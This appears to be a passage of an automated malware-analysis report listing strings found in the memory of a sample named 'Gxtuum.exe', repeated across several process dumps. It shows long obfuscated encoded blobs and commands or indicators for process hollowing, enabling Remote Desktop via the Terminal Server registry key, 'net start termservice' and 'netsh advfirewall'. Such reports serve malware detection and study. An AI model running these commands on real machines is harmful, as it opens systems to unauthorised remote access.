A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000007.00000002.2559939352.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000007.00000002.2559939352.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000007.00000000.2556873378.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000007.00000000.2556873378.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000008.00000000.3146381774.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000008.00000000.3146381774.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000008.00000002.3148418384.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000008.00000002.3148418384.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000009.00000000.3746394163.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000009.00000000.3746394163.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000009.00000002.3748724251.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
